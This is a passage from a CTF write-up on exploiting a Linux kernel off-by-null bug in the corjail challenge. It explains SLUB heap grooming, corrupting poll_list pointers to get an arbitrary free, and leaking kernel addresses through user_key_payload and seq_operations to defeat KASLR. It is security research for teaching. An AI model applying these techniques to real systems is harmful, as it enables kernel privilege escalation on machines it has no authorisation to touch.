evaluate those techniques.</p>

<p>The third category are frees of objects in one of our CPU’s partially filled slabs that happen on a foreign CPU. This can be mitigated against by filling all partial slabs prior to exploitation (see below). Foreign CPUs will now free objects in full slabs, which results in the now partial slab being moved to their partial list.</p>

<p>The last category are allocations that are happening during interrupts. To the best of my knowledge, there is not much we can do about them.</p>

<p>In the previous section, we already mentioned that the allocation size is not the only parameter that influences which cache serves an allocation request. For example, depending on the kernel version and configuration, reclaiming the slot of an object that was allocated by a call to kmalloc with <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> by spraying objects that have the same size but are allocated with <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/gfp.h#L299"><code class="language-plaintext highlighter-rouge">GFP_KERNEL</code></a> is a hopeless ordeal. This is since the objects are allocated in different caches. In general, this problem can be overcome by draining the slab, which, as you maybe recall, causes it to be destroyed and handed back to the page allocator, and then re-using the very same memory for a slab in another cache. (Note: The page allocator, also known as the Buddy Allocator, is used by the kernel to allocate one or more pages of contiguous memory). I other cases it might be viable to “spray slabs” to create a memory layout where slabs belonging to different caches are adjacent. This can then be used to perform cross cache overflows or to exploit partial pointer overwrites.</p>

<p>Finally, there is the problem posed by an unknown allocator state, i.e., number, fill status and object composition of existing per-CPU and per-node slabs when we start our exploit. We can normalize the heap state by performing a large number of allocations, followed by freeing a slab worth of them to force a state where there is an empty CPU slab and a single partial slab. In the literature this technique is often called defragmentation and I tried to illustrate its effect in the following drawing.
<img src="/media/Linux-S1/defragment.jpg" alt="" /></p>

<p>However, being able to create an allocator state with an empty CPU slab does not imply that is is trivial to control the relative positioning of vulnerable and victim object allocations. One reason why this is still hard is due to the randomization of the order in which the slots of the slab are handed out by the allocator. To successfully exploit an out-of-bounds write, for example, one can try to allocate the vulnerable object in a slab that’s otherwise filled with victim objects. If the vulnerable object offers an out-of-bounds read, or other information leak primitives, they might as well be used to defeat the mitigation.</p>

<p>Of course I can not, and probably should not attempt to, give a comprehensive overview of heap exploitation and exploit stabilization techniques at this point. I tried to focus on the things that will become relevant in the exploit we discuss below, but there is a lot more one could say about the topic. For example, you could read about cross cache attacks [<a href="https://etenal.me/archives/1825">20</a>] [<a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">21</a>], attacking the implementation [<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">22</a>] or completely re-purposing the slab’s pages [<a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">23</a>]. This recent paper by Kyle et al. might also be a good starting point [<a href="https://github.com/sefcom/KHeaps">24</a>].</p>

<h2 id="constructing-an-arbitrary-free-primitive">Constructing an Arbitrary Free Primitive</h2>

<p>Recall that the bug is essentially giving us the following primitive</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">filter</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="mi">4096</span><span class="p">,</span> <span class="n">GFP_KERNEL_ACCOUNT</span><span class="p">);</span>
<span class="p">...</span>
<span class="n">filter</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>
<p>In other words, we can write a single null byte out of bounds in a kmalloc-4k slab.</p>

<p>What can we do with that primitive? Of course, we can look up possible answers as there are public exploits for this challenge, but let’s nevertheless go through some ideas.</p>

<p>Brandon Azad of Google Project Zero defines an <em>exploit strategy</em> as <em>“The low-level, vulnerability-specific method used to turn the vulnerability into a useful exploit primitive.”</em> [<a href="https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html">25</a>]. Our bug already gives us a useful, albeit rather weak, primitive. Thus, what we need is an <em>exploit technique</em>, i.e., <em>“A reusable and reasonably generic strategy for turning one exploit primitive into another (usually more useful) exploit primitive.”</em>. We can gather ideas for possible exploit techniques by looking at public exploits that had similar primitives, a good starting point would be Google’s <em>Kernel Exploits Recipes Notebook</em> [<a href="https://docs.google.com/document/d/1a9uUAISBzw3ur1aLQqKc5JOQLaJYiOP5pe_B4xCT1KA/edit#heading=h.nqnduhrd5gpk">26</a>], but there is probability no way around reading lots of blog posts.</p>

<p>One idea would be to corrupt the <em>reference count</em> of an adjacent victim object. Many kernel objects have a field that keeps track of the number of entities that are using the object. When some entity releases its reference, it is checked whether they were the last one holding on to the object, and in that case, the object will be destroyed. Thus, by using our corruption primitive to decrement a refcount we could maybe cause a use-after-free over some victim object.</p>

<p>Another idea would be to corrupt the <em>flags</em> of an object, causing it to be handled in an unexpected manner. Yet another common ansatz would be to corrupt a <em>length</em> field in some victim structure to subsequently exploit flawed bounds checks on the corresponding buffer. However, the latter idea suffers from the fact that our primitive can only ever decrease a value, which is maybe not what we want to do with a length.</p>

<p>While all those ideas might very well work, we will go with another typical target of partial overwrites: pointers. Roughly speaking, there are three kinds of pointers that might be present in a victim structure: function pointers, data pointers, or linked list pointers. But how do find objects that have an interesting pointer as the first member?</p>

<p>Since we compiled the kernel with debugging information we can use the <code class="language-plaintext highlighter-rouge">pahole</code> tool to list kernel structs. (The <code class="language-plaintext highlighter-rouge">–E</code> expands embedded structs and typedefs, whereas the other two commands generate lists of object sizes and variable-size objects, respectively.)</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>pahole <span class="nt">--structs</span> <span class="nt">-E</span> vmlinux <span class="o">&gt;</span> /tmp/pahole_vmlinux_E
<span class="nv">$ </span>pahole <span class="nt">-s</span> vmlinux <span class="o">&gt;</span> /tmp/pahole_vmlinux_s
<span class="nv">$ </span>pahole <span class="nt">--with_flexible_array</span> vmlinux <span class="o">&gt;</span> /tmp/pahole_vmlinux_flex
</code></pre></div></div>
<p>From now on, which kinds of queries we can make against the set of kernel objects is only limited by our command over the chaining of core UNIX utilities. For example, we can generate a list of the 5 biggest structs that start with a function pointer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sm_metadata 25200
sm_disk 8752
e1000_mac_info 768
poll_wqueues 560
net_device_ops 560
</code></pre></div></div>
<p>However, upon closer inspection, none of those objects looks like it can be allocated in kmalloc-4k. Generating the list of all structs that start with a function pointer and have a flexible array member yields the following set</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ahash_request_priv
ff_device
pci_packet
pm_clk_notifier_block
Qdisc
</code></pre></div></div>
<p>Again, none of those structures looks like we can control its allocation in kmalloc-4k, and even if we could, it is questionable whether the partial overwrite of the function pointer would be of any use.</p>

<p>Using a memory corruption primitive for attacking linked lists has an awfully long history in exploitation. For example, TheFlow used a two null byte OOB write to corrupt the list linking messages in a POSIX message queue [<a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html">27</a>]. While we cannot use this technique due to our container’s seccomp filter, we will go with the general idea.</p>

<p>One idea to exploit the fact that some object is know unknowingly part of the list is to trigger a clean up of the list to arbitrarily free the object. In pictures, this means turning
<img src="/media/Linux-S1/ssl_idea.jpg" alt="" />
into
<img src="/media/Linux-S1/arb_free_idea.jpg" alt="" /></p>

<p>We can try to identify structs that are potentially chained in such a way by generating a list of all structs that start with a member of type “pointer-to-own-struct-type”. Again, there is no object with a size that could end up in kmalloc-4k, but filtering for flexible array members yields a somewhat short list.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bio
hpets
mmu_gather_batch
neighbour
nh_group
pneigh_entry
poll_list
poll_table_page
sched_domain
sched_group
</code></pre></div></div>
<p>(Note: You might wonder why the above-mentioned messages are not appearing in this list. This is since they linked using the kernels list management api, the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/types.h#L178"><code class="language-plaintext highlighter-rouge">stuct list_head</code></a> to be concrete. Including those is left as an exercise for the reader.)</p>

<p>Identifying some struct that looks like it might be a suitable victim object is good, however, we still need to verify that we are able to reliably allocate it next to the vulnerable object. Furthermore, the way in which the object is used after the corruption must provide us with a useful exploitation primitive without endangering system stability.</p>

<p>It would be interesting to develop a more sophisticated solution that allows for more complex queries against the set of kernel structures. Combining it with compile-time static analysis for finding allocation sites and run-time tracing to identify reaching code paths could improve the seemingly very manual process of victim object discovery.</p>

<p>The above list already includes our victim-of-choice, the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L839"><code class="language-plaintext highlighter-rouge">poll_list</code></a>. It was discovered by the challenge author, and it seems likely the challenge was designed with that abject in mind.</p>

<p>By reading its man page we can learn that the poll system call allows a process to pass the kernel a table whose rows consist of a file descriptor and a list of events that might occur on it [<a href="https://man7.org/linux/man-pages/man2/poll.2.html">28</a>]. When one of those events occurs, the system call will return, and the third column will indicate which events occurred. Imagine, for example, a single threaded asynchronous server that has many open connections to clients, each represented by a file descriptor. The server may then serve all those clients by using poll to get notified when new data arrives on any of those connections. The other parameter of the poll system call is the timeout in milliseconds before it will unconditionally return.</p>

<p>Internally, the kernel saves the table in a singly linked list of <code class="language-plaintext highlighter-rouge">poll_list</code> objects. The first few rows are saved on the kernel stack as a performance optimization {1}, while the rest is split into chunks of 510 rows {2}, which are allocated in kmalloc-4k {3}. The last, potentially smaller, chunk might end up in another cache, kmalloc-32 in our case.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">do_sys_poll</span><span class="p">(</span><span class="k">struct</span> <span class="n">pollfd</span> <span class="n">__user</span> <span class="o">*</span><span class="n">ufds</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">nfds</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">timespec64</span> <span class="o">*</span><span class="n">end_time</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">poll_wqueues</span> <span class="n">table</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">,</span> <span class="n">fdcount</span><span class="p">,</span> <span class="n">len</span><span class="p">;</span>
	<span class="cm">/* Allocate small arguments on the stack to save memory and be
	   faster - use long to make sure the buffer is aligned properly
	   on 64 bit archs to avoid unaligned access */</span>
	<span class="kt">long</span> <span class="n">stack_pps</span><span class="p">[</span><span class="n">POLL_STACK_ALLOC</span><span class="o">/</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">)];</span> <span class="c1">// {1}</span>
	<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="k">const</span> <span class="n">head</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="p">)</span><span class="n">stack_pps</span><span class="p">;</span>
 	<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="n">walk</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>
 	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">todo</span> <span class="o">=</span> <span class="n">nfds</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">nfds</span> <span class="o">&gt;</span> <span class="n">rlimit</span><span class="p">(</span><span class="n">RLIMIT_NOFILE</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">len</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">,</span> <span class="n">nfds</span><span class="p">,</span> <span class="n">N_STACK_PPS</span><span class="p">);</span>
	<span class="k">for</span> <span class="p">(;;)</span> <span class="p">{</span>
		<span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
		<span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">len</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">walk</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">,</span> <span class="n">ufds</span> <span class="o">+</span> <span class="n">nfds</span><span class="o">-</span><span class="n">todo</span><span class="p">,</span>
					<span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">pollfd</span><span class="p">)</span> <span class="o">*</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">))</span>
			<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>

		<span class="n">todo</span> <span class="o">-=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">todo</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">todo</span><span class="p">,</span> <span class="n">POLLFD_PER_PAGE</span><span class="p">);</span> <span class="c1">// {2}</span>
		<span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="n">struct_size</span><span class="p">(</span><span class="n">walk</span><span class="p">,</span> <span class="n">entries</span><span class="p">,</span> <span class="n">len</span><span class="p">),</span>
					    <span class="n">GFP_KERNEL</span><span class="p">);</span> <span class="c1">// {3}</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">walk</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="n">poll_initwait</span><span class="p">(</span><span class="o">&amp;</span><span class="n">table</span><span class="p">);</span>
	<span class="n">fdcount</span> <span class="o">=</span> <span class="n">do_poll</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">table</span><span class="p">,</span> <span class="n">end_time</span><span class="p">);</span> <span class="c1">// {4}</span>
	<span class="n">poll_freewait</span><span class="p">(</span><span class="o">&amp;</span><span class="n">table</span><span class="p">);</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">user_write_access_begin</span><span class="p">(</span><span class="n">ufds</span><span class="p">,</span> <span class="n">nfds</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">ufds</span><span class="p">)))</span>
		<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>

	<span class="k">for</span> <span class="p">(</span><span class="n">walk</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span> <span class="n">walk</span><span class="p">;</span> <span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// {5}</span>
		<span class="k">struct</span> <span class="n">pollfd</span> <span class="o">*</span><span class="n">fds</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">;</span>
		<span class="kt">int</span> <span class="n">j</span><span class="p">;</span>

		<span class="k">for</span> <span class="p">(</span><span class="n">j</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span> <span class="n">j</span><span class="p">;</span> <span class="n">fds</span><span class="o">++</span><span class="p">,</span> <span class="n">ufds</span><span class="o">++</span><span class="p">,</span> <span class="n">j</span><span class="o">--</span><span class="p">)</span>
			<span class="n">unsafe_put_user</span><span class="p">(</span><span class="n">fds</span><span class="o">-&gt;</span><span class="n">revents</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ufds</span><span class="o">-&gt;</span><span class="n">revents</span><span class="p">,</span> <span class="n">Efault</span><span class="p">);</span>
  	<span class="p">}</span>
	<span class="n">user_write_access_end</span><span class="p">();</span>

	<span class="n">err</span> <span class="o">=</span> <span class="n">fdcount</span><span class="p">;</span>
<span class="nl">out_fds:</span>
	<span class="n">walk</span> <span class="o">=</span> <span class="n">head</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">walk</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// {6}</span>
		<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="n">pos</span> <span class="o">=</span> <span class="n">walk</span><span class="p">;</span>
		<span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>
		<span class="n">kfree</span><span class="p">(</span><span class="n">pos</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>

<span class="nl">Efault:</span>
	<span class="n">user_write_access_end</span><span class="p">();</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
	<span class="k">goto</span> <span class="n">out_fds</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></div></div>
<p>Afterwards, the kernel will periodically check on all the file descriptors in the call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L884"><code class="language-plaintext highlighter-rouge">do_poll</code></a> {4}. When a requested event occurs, or the timeout fires, the call returns, and the kernel will walk through the list and copy the occurred events back to user space {5}, freeing the list of <code class="language-plaintext highlighter-rouge">poll_list</code> objects afterwards {6}.</p>

<p>The number of objects in a kmalloc-4k slab on our target system is eight. Consequently, the ideal memory layout for exploiting our off-by-null bug would be to have seven victim <code class="language-plaintext highlighter-rouge">poll_list</code> objects and one vulnerable syscall filter object in the same slab.</p>

<p>Then, there is a 7/8 probability of writing to a <code class="language-plaintext highlighter-rouge">next</code> pointer of a <code class="language-plaintext highlighter-rouge">poll_list</code>, with a chance that the remaining cases write to unused memory after the slab and thus maybe do not cause a kernel crash.</p>

<p>There’s another 7/8 chance that we actually corrupt the next pointer, with the other cases being ones where it already ends in a null byte. Those are also retryable.</p>

<p>If we manage to trigger a corruption, we would like to maximize the probably that the corrupted pointer now points to a victim object. Consequently, we would like 121 of the 128 objects in the kmalloc-32 slab to be victim objects, with the other seven objects being the next <code class="language-plaintext highlighter-rouge">poll_list</code> objects. Therefore, assuming that the pointer was corrupted, there is a 121/127 chance that it now points to a victim object, with the other cases being the ones where it points to another <code class="language-plaintext highlighter-rouge">poll_list</code>. While the double-free that occurs in the latter case is very likely to lead to a kernel crash down the road, an overall best-case 121/127 probability of a successful arbitrary free is not too bad. (Best-case as there are rare occasions where other effects interfere with our allocations, c.f., the above discussion.)</p>

<p>The following drawing illustrates the desired memory layout.
<img src="/media/Linux-S1/mem_pl_corr.jpg" alt="" />
By corrupting the next pointer of the second-to-last node in a singly linked list of <code class="language-plaintext highlighter-rouge">poll_list</code> objects we include an unsuspecting victim object in the list. Returning from the system call triggers the list cleanup and arbitrarily frees the victim object.</p>

<h2 id="exploiting-the-arbitrary-free">Exploiting the Arbitrary Free</h2>

<p>In theory, we now know how to turn our OOB write into an arbitrary free primitive. However, we still need to implement and execute it. Furthermore, there remains the open question of: what is it that we want to free?</p>

<p>Since our partial override can only divert the next pointer to an object in the same slab as the original one, the victim must live in kmalloc-32 as well. Luckily for us, there exists previous research on victim objects, which also considered where they can be allocated [<a href="https://zplin.me/papers/ELOISE.pdf">29</a>], [<a href="https://github.com/smallkirby/kernelpwn/blob/master/structs.md#user_key_payload">30</a>]. They already identified <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/keys/user-type.h#L27"><code class="language-plaintext highlighter-rouge">user_key_payload</code></a> as an object with some pleasant properties. For some background on the in-kernel key management and retention facility, see [<a href="https://man7.org/linux/man-pages/man7/keyrings.7.html">31</a>].</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct user_key_payload {
	struct callback_head {
		struct callback_head * next;                                             /*     0     8 */
		void               (*func)(struct callback_head *);                      /*     8     8 */
	}rcu; /*     0    16 */
	short unsigned int         datalen;                                              /*    16     2 */

	/* XXX 6 bytes hole, try to pack */

	char                       data[];                                               /*    24     0 */

	/* size: 24, cachelines: 1, members: 3 */
	/* sum members: 18, holes: 1, sum holes: 6 */
	/* last cacheline: 24 bytes */
};
</code></pre></div></div>
<p>The struct is a simple container for user-supplied <code class="language-plaintext highlighter-rouge">data</code>, where the length of the data is stored alongside it in the <code class="language-plaintext highlighter-rouge">datalen</code> field. Crucially, the kernel will consult this length field when copying the data back to user space [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L171">32</a>]. Thus, by aiming our arbitrary free at this object we can easily create an information leak from the resulting use-after-free. At this point, the attentive reader might spot a potential problem. Recall how the kernel cleans up the <code class="language-plaintext highlighter-rouge">poll_list</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">while</span> <span class="p">(</span><span class="n">walk</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">poll_list</span> <span class="o">*</span><span class="n">pos</span> <span class="o">=</span> <span class="n">walk</span><span class="p">;</span>
	<span class="n">walk</span> <span class="o">=</span> <span class="n">walk</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>
	<span class="n">kfree</span><span class="p">(</span><span class="n">pos</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>i.e., we potentially jeopardize system stability if the first QWORD of the victim object is not under our control. This is where the second useful property of <code class="language-plaintext highlighter-rouge">user_key_payload</code> becomes important: its first two QWORDs are not initialized on allocation. However, this only leads us to the next problem: how to initialize them?</p>

<p>Back in 2018 Vitaly Nikolenko invented the “universal heap spray” that, in essence, allowed the allocation of an arbitrary amount of data in arbitrary caches [<a href="https://duasynt.com/blog/linux-kernel-heap-spray">33</a>]. One part of the technique involved the observation that the <code class="language-plaintext highlighter-rouge">setxattr</code> system call essentially makes an allocation with a user-controlled size and then fills it with user-controlled data [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/xattr.c#L511">34</a>] [<a href="https://man7.org/linux/man-pages/man7/xattr.7.html">35</a>]. The problem with heap spraying, however, is that the buffer is freed when the syscall returns. In our case that is not a problem at all as it provides a reliable way to initialize heap memory. In particular, by reclaiming the chunk used during the setxattr operation when allocating the key, we ensure that confusing our key for a <code class="language-plaintext highlighter-rouge">poll_list</code> does not cause unpredictable behavior during list cleanup. To speed up this preparatory step, we can make the <code class="language-plaintext highlighter-rouge">copy_from_user</code> operation fail at the last byte, e.g., by letting it run into unmapped memory, to skip the rest of the syscall.</p>

<p>To create the memory layout sketched above, we begin by normalizing the kmalloc-4k and kmalloc-32 caches as described in the section on SLUB exploitation [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L350C2-L362C18">36</a>]. Then, we start seven threads to allocate the <code class="language-plaintext highlighter-rouge">poll_list</code> objects, and another thread to allocate <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L365C1-L383C1">37</a>]. While using threads for polling is necessary due to the blocking nature of the system call, using threads for the keys is optional, but might reduce the chance of unexpected allocations due to the scheduling of an unrelated task. The main thread triggers the memory corruption once all <code class="language-plaintext highlighter-rouge">poll_list</code> objects are allocated [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L294">38</a>].</p>

<p>We continue by preparing a favorable type confusion over the victim object.
<img src="/media/Linux-S1/seq_ops_reclaim.jpg" alt="" />
For that purpose, we allocate many <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/seq_file.h#L31"><code class="language-plaintext highlighter-rouge">seq_operations</code></a> structs after freeing the <code class="language-plaintext highlighter-rouge">user_key_payload</code>. The former is a well-known struct full of kernel function pointers, that is allocated whenever <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/seq_file.c#L561"><code class="language-plaintext highlighter-rouge">single_open</code></a> is called, e.g., when opening “/proc/self/stat”. As the two least significant bytes of a function pointer now corrupted the <code class="language-plaintext highlighter-rouge">datalen</code> of the <code class="language-plaintext highlighter-rouge">user_key_payload</code>, reading it back gives us a substantial chunk of kernel heap data.</p>

<p><em>Aside: One neat optimization that we can do at this point is to start spraying as soon as the corruption has happened. The thread whose <code class="language-plaintext highlighter-rouge">poll_list</code> was corrupted can notice the fact by priming the <code class="language-plaintext highlighter-rouge">revents</code> of the last two <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/uapi/asm-generic/poll.h#L36"><code class="language-plaintext highlighter-rouge">pollfd</code></a> with a magic value. Usually, the kernel will overwrite them before returning.</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for (walk = head; walk; walk = walk-&gt;next) {
	struct pollfd *fds = walk-&gt;entries;
	int j;

	for (j = walk-&gt;len; j; fds++, ufds++, j--)
		unsafe_put_user(fds-&gt;revents, &amp;ufds-&gt;revents, Efault);
}
</code></pre></div></div>
<p><em>However, when confusing the <code class="language-plaintext highlighter-rouge">user_key_payload</code> for a <code class="language-plaintext highlighter-rouge">poll_list</code> the <code class="language-plaintext highlighter-rouge">walk-&gt;entries</code> will be zero and the magic value will remain [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/libexp/poll_stuff.c#L124">39</a>].</em></p>

<p>While the function pointer leak breaks kernel address space layout randomization (KASLR) we require more leaks in order to successfully finish our exploit.
<img src="/media/Linux-S1/kaslr.jpg" alt="" />
First, we would like to use our arbitrary free primitive again to cause a more powerful use-after-free, but for that to work, we need to know the address of an object to aim at. Second, the kernel image is not the only region that is affected by KASLR. There is also the kernel’s direct map and the array of <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/mm_types.h#L70"><code class="language-plaintext highlighter-rouge">page</code></a> structures used to manage it [<a href="https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html">40</a>]. We will make use of all those leaks later.</p>

<p>The good news is we can collect all those addresses in one sweep. In preparation for this step, we first free up some space in the affected slab by releasing all but the corrupted <code class="language-plaintext highlighter-rouge">user_key_payload</code>.
<img src="/media/Linux-S1/tty_leak.jpg" alt="" />
Opening a pseudo-terminal, i.e., “/dev/ptmx”, causes many allocations [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/drivers/tty/pty.c#L811">41</a>]. Two of those land in kmalloc-32 and can thus be exposed by our OOB read primitive. The first one is a <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L347"><code class="language-plaintext highlighter-rouge">tty_file_private</code></a>, which is part of a doubly linked list hanging off the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L285"><code class="language-plaintext highlighter-rouge">tty_struct</code></a>, connecting it to all <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L916"><code class="language-plaintext highlighter-rouge">file</code></a>s open for it. Leaking its contents gives us the address of the <code class="language-plaintext highlighter-rouge">tty_struct</code> as well as a <code class="language-plaintext highlighter-rouge">file</code>, both of which are attractive targets for an arbitrary free [<a href="https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html">42</a>] [<a href="https://github.com/smallkirby/kernelpwn/blob/master/technique/tty_struct.md">43</a>]. The second one is caused by a call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/mm.h#L763"><code class="language-plaintext highlighter-rouge">kvmalloc</code></a>, which internally allocates a small buffer to hold pointers to the <code class="language-plaintext highlighter-rouge">page</code>s it allocated [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/mm/vmalloc.c#L2478">44</a>]. We will elaborate on the conditions under which those leaks are sufficient to deduce the base address of the respective memory regions in the next post.</p>

<h2 id="wrap-up">Wrap Up</h2>

<p>We started our journey by setting up an exploit development environment, which we then used to interactively explore the challenge. After that, we reverse-engineered the vulnerable driver to discover an off-by-null bug. A brief introduction to the SLUB allocator and current heap exploitation methods was needed to understand and implement the technique used to turn the bug into an arbitrary free primitive. Finally, we exploited the arbitrary free to leak the base addresses of three separately randomized kernel memory regions and two heap-allocated kernel structures.</p>

<p>The above-mentioned video recording contains a live debugging session with all the exploit steps discussed here. You can try it out locally by installing the kernel debugging setup and compiling the exploit repository.</p>

<p>In the next post, we will, step-by-step, gain stronger exploit primitives, ending up with arbitrary kernel read/write or arbitrary code execution via ROP.</p>

<h2 id="references">References</h2>

<p>[0] https://www.youtube.com/playlist?list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t</p>

<p>[2] https://2022.cor.team/</p>

<p>[3] https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail</p>

<p>[4] https://syst3mfailure.io/corjail/</p>

<p>[5] https://github.com/0xricksanchez/like-dbg</p>

<p>[6] https://github.com/vobst/like-dbg-fork-public</p>

<p>[7] https://github.com/vobst/ctf-corjail-public</p>

<p>[8] https://android-developers.googleblog.com/2020/06/system-hardening-in-android-11.html</p>

<p>[9] https://www.llvm.org/docs/ScudoHardenedAllocator.html</p>

<p>[10] https://lwn.net/Articles/932201/</p>

<p>[11] https://en.wikipedia.org/wiki/Slab_allocation</p>

<p>[12] https://blogs.oracle.com/linux/post/linux-slub-allocator-internals-and-debugging-1</p>

<p>[13] https://events.static.linuxfound.org/sites/events/files/slides/slaballocators.pdf</p>

<p>[14] https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf</p>

<p>[15] https://github.com/nccgroup/libslub</p>

<p>[16] https://github.com/PaoloMonti42/salt</p>

